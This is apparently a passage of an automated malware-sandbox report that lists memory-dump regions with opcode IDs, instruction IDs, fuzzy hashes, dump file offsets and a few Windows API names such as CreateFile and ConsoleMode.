                                                            • Opcode ID: 2a428f8809fcedbf251dd4832aedb48c48465b3fcb3d8d4b3b4cb6677e84e5be
                                                            • Instruction ID: 8fe995edc20ac0284744af27699bd5485a44b6a8116a4381b822a88c07012402
                                                            • Opcode Fuzzy Hash: 2a428f8809fcedbf251dd4832aedb48c48465b3fcb3d8d4b3b4cb6677e84e5be
                                                            • Instruction Fuzzy Hash: 12210A3190CA4C8FDB58DF9CD84A7E97FE1EBA5321F04412BD448C3152DA74941ACB92
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1432019030.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction ID: 1c7920ea4062687c4cdba900a46f4fc62e4f1ee6efa5599f9ddd47f560b9f5cd
                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction Fuzzy Hash: A401A73015CB0C8FD744EF0CE451AA5B3E0FB95360F10052DE58AC3661DA36E882CB42
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1432428045.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69d458b5802c2c4beb45cd0f045520eb1c4823e05f154004173838ddf0760cd7
                                                            • Instruction ID: 6b86b47b0a964339608f33bd5931d926cedceeee6b803046129843171b0bd082
                                                            • Opcode Fuzzy Hash: 69d458b5802c2c4beb45cd0f045520eb1c4823e05f154004173838ddf0760cd7
                                                            • Instruction Fuzzy Hash: C0F0BE32A1C9448FE668EB5CE4408E873E0FF4432071001BAE02EC71A3CB2AFC40CB41
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1432428045.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c00db0f604f39ea398d16904633f65abb4132539b806eb1e75661e39da6a82d
                                                            • Instruction ID: 888d6222d99960779a3ed1e4d8bfa04df0f66b24b908a58e68d468dc93909cb6
                                                            • Opcode Fuzzy Hash: 2c00db0f604f39ea398d16904633f65abb4132539b806eb1e75661e39da6a82d
                                                            • Instruction Fuzzy Hash: 3AF05E31A1C5448FE75AEB5CE4419E877E0FF0536071401B6E01EC7167CA2AEC44CB41
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1432428045.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a90ea396255cdf9f524ca20315f03f8aa8402de6c88b192c4152f137256b92a7
                                                            • Instruction ID: d044ff40247501935cc62fb1794fd24d78c52bad4f946eef397ecc317227474a
                                                            • Opcode Fuzzy Hash: a90ea396255cdf9f524ca20315f03f8aa8402de6c88b192c4152f137256b92a7
                                                            • Instruction Fuzzy Hash: 64F0A03171CF044FE748EE2DE4497A2B7E0FBA8354F10462FE44AC3251DA25E8818782
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1432019030.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a84dda7dd64f3ef2fec95b18bef45aaa81197ee8d18c8465fe0f7ba675c653b
                                                            • Instruction ID: 80759f74f5a597154104b77e57c65b24d6960b318d0a0eab9f0215e3976e2e91
                                                            • Opcode Fuzzy Hash: 0a84dda7dd64f3ef2fec95b18bef45aaa81197ee8d18c8465fe0f7ba675c653b
                                                            • Instruction Fuzzy Hash: F0E01A75814A4D8F8B48EF28D8594E97FE0FF69221B44029AE91DC7160DB719958CBC2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2816969426.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 64512db3d03c2e64250f0527e4973935a6f50c0e8de340a78d05c5d7239ddcf0
                                                            • Instruction ID: fb85bb78a4fff46372a9ddb275d3875d08bff245c5c2d1070d2c6bebe9a56f46
                                                            • Opcode Fuzzy Hash: 64512db3d03c2e64250f0527e4973935a6f50c0e8de340a78d05c5d7239ddcf0
                                                            • Instruction Fuzzy Hash: 3B71D17190CA488FD759DB6CD85A7B97BE1FB69350F04426EE04DD7292DE38A8028B81
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2816969426.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                                            Similarity
                                                            • API ID: ConsoleMode
                                                            • String ID:
                                                            • API String ID: 4145635619-0
                                                            • Opcode ID: 69fcb436a9df19dac27cf5822f08470487e3475ad9791ee55e213e3e08c27444
                                                            • Instruction ID: 8115d3ab6c58c3d600f59c095164eaf50b3567dae551ddb27529af3b35afa710
                                                            • Opcode Fuzzy Hash: 69fcb436a9df19dac27cf5822f08470487e3475ad9791ee55e213e3e08c27444
                                                            • Instruction Fuzzy Hash: 49310431D0CA5C8FDB58DF98C8497E9BBE1FF65320F0441AAD449D7286DB34A842CB81
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2816969426.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                                            Similarity
                                                            • API ID: ConsoleMode
                                                            • String ID:
                                                            • API String ID: 4145635619-0
                                                            • Opcode ID: 0d49c0d3479054a6e52038d79fcd017d12c0ae64fba686cd03b8288956adc33c
                                                            • Instruction ID: ea9441089030bea8c76aabb2f8c21434ea2b559ffb7d8babbf1acbafe5d89ccc
                                                            • Opcode Fuzzy Hash: 0d49c0d3479054a6e52038d79fcd017d12c0ae64fba686cd03b8288956adc33c
                                                            • Instruction Fuzzy Hash: 7B31263190C7488FEB58DFA8C84A7F97BE0EF66320F04416FD049C7292DA74A815CB92
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2825142020.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e690895af9c3d569fbd9b41cd2beb8d940cd3810b66152c5e58db1d024604646
                                                            • Instruction ID: 1f7a42f1480b3d9c11a05bd3bb77bd141acb76e853adb83ca24674a97ee1750f
                                                            • Opcode Fuzzy Hash: e690895af9c3d569fbd9b41cd2beb8d940cd3810b66152c5e58db1d024604646
                                                            • Instruction Fuzzy Hash: D412E221D0EBC55FE39697285C651B47FE1FF93250B4951FAC18ACB293D91DAC0AC382
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2825142020.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e5c9b10b0f8ba53a05f8f2ec02d79f08b58d791aa2d7961a6b56826c0138a07
                                                            • Instruction ID: 5a67270c6a6e8650226d8e2c4a7069c4e801e8316571a5e0f86e47ffead3370f
                                                            • Opcode Fuzzy Hash: 9e5c9b10b0f8ba53a05f8f2ec02d79f08b58d791aa2d7961a6b56826c0138a07
                                                            • Instruction Fuzzy Hash: 50A13631D0DA8D4FE766AB285C555B63BE1FF8A264B0401BED18EC7193ED19BC06C342
                                                            Memory Dump Source
                                                            • Source File: 00000018.00000002.2825142020.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccb0703d5796d2f00c8ac07fe66ab10294416364240f1fa8c85d674f5f62b03e
                                                            • Instruction ID: 212c83652e9e059f9abc282ac4d5c4db8ae9e1e10abf175cbea2578569cd1bc7
                                                            • Opcode Fuzzy Hash: ccb0703d5796d2f00c8ac07fe66ab10294416364240f1fa8c85d674f5f62b03e
                                                            • Instruction Fuzzy Hash: 01217C22E1DA992FF2A9562C2C55174A6C1FF507A078852BEC64EC33C7EC1D7C068182
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2814788622.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33b1f82a579181c059883eee4854640508a6bf2e4abbfb5e671e3b34f0609efc
                                                            • Instruction ID: 7b1a64b87aef8abaf062669d4727bbc0f132d67b9c967877583bed58510d8a95
                                                            • Opcode Fuzzy Hash: 33b1f82a579181c059883eee4854640508a6bf2e4abbfb5e671e3b34f0609efc
                                                            • Instruction Fuzzy Hash: 7471E27190CA484FD759EF6CD85A6B97BE1FF59310F0442AEE04DD7292DE28A802C781
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2814788622.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d83b8e31bf8affafe1b8ba08b7a764b43ab07174d0e6d49f7eeb3d460c6dd87
                                                            • Instruction ID: da87e96931b907ebd862cf37d9b967b1a7bd4875672c36783279ff97b9e1753f
                                                            • Opcode Fuzzy Hash: 6d83b8e31bf8affafe1b8ba08b7a764b43ab07174d0e6d49f7eeb3d460c6dd87
                                                            • Instruction Fuzzy Hash: 2241F331D0CA888FEB58DB58D8496B97BE1FF69350F14427FE04DD3192DA64AC02CB81
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2814788622.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID: ConsoleMode
                                                            • String ID:
                                                            • API String ID: 4145635619-0
                                                            • Opcode ID: 7bdf507ab36df0a450541e3cae3fac152e4ebd958f9997cb80750a3a281d05b5
                                                            • Instruction ID: c3677b8e5ea8846ec4d37b96e114b857c818a761d6d8bc3da196a1a49027d894
                                                            • Opcode Fuzzy Hash: 7bdf507ab36df0a450541e3cae3fac152e4ebd958f9997cb80750a3a281d05b5
                                                            • Instruction Fuzzy Hash: D8312231D0CA588FDB58EFA8C8457E9BBE1EF56320F0441ABD449D7286DB34A842CB81
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2814788622.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID: ConsoleMode
                                                            • String ID:
                                                            • API String ID: 4145635619-0
                                                            • Opcode ID: 5208208e5cbc2df1e38b3b272fef0764741845c0cca824584ea65d51356a9ab0
                                                            • Instruction ID: 5422ded136a3beb2122e74f8c568e73b8518c2ebe189eed79df78962365b31de
                                                            • Opcode Fuzzy Hash: 5208208e5cbc2df1e38b3b272fef0764741845c0cca824584ea65d51356a9ab0
                                                            • Instruction Fuzzy Hash: A631263190C6488FEB58EFA8C8467F97BE1EF65320F04016FD049C7293DA74A815CB91
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2823512220.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6b6019fcad318183b09a610a99861398ef70e761e6ded32dc550d23454ce89
                                                            • Instruction ID: 75008ae54eb587b4b227201df589767bbf9dcfb12ab57a7429ca7f6c655b3cc1
                                                            • Opcode Fuzzy Hash: bf6b6019fcad318183b09a610a99861398ef70e761e6ded32dc550d23454ce89
                                                            • Instruction Fuzzy Hash: 4A12D421D0EBC65FE39697385C251B4BFE1FF522A0B4911FBD08ACB1A3D9599C06C392
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2823512220.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1530cddeb6b8970adb887f87cd63efd40a8cba249e3776b2fa514be2a1c33df8
                                                            • Instruction ID: 16beae967255f152f963be843e3b9e2b913cb279033b3b2af5c75910aa4b745e
                                                            • Opcode Fuzzy Hash: 1530cddeb6b8970adb887f87cd63efd40a8cba249e3776b2fa514be2a1c33df8
                                                            • Instruction Fuzzy Hash: 03A16731D1DB8D4FE796AB285C556B57BE1FF8A660B0401BFD04EC3093EA19AC06C342
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2823512220.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c586707293b0beb77190ee2afce95704a258836af97a1ca7938a15a18990e8d
                                                            • Instruction ID: 43ed79750584ac66ad990040337fe888d1398f749ac8c8e6b873db2a2c1e3286
                                                            • Opcode Fuzzy Hash: 6c586707293b0beb77190ee2afce95704a258836af97a1ca7938a15a18990e8d
                                                            • Instruction Fuzzy Hash: B9212C23E1DE9A1BF3A5526C2C15174A6C1FF917A0B9852BED44EC31C7EC59AC06C186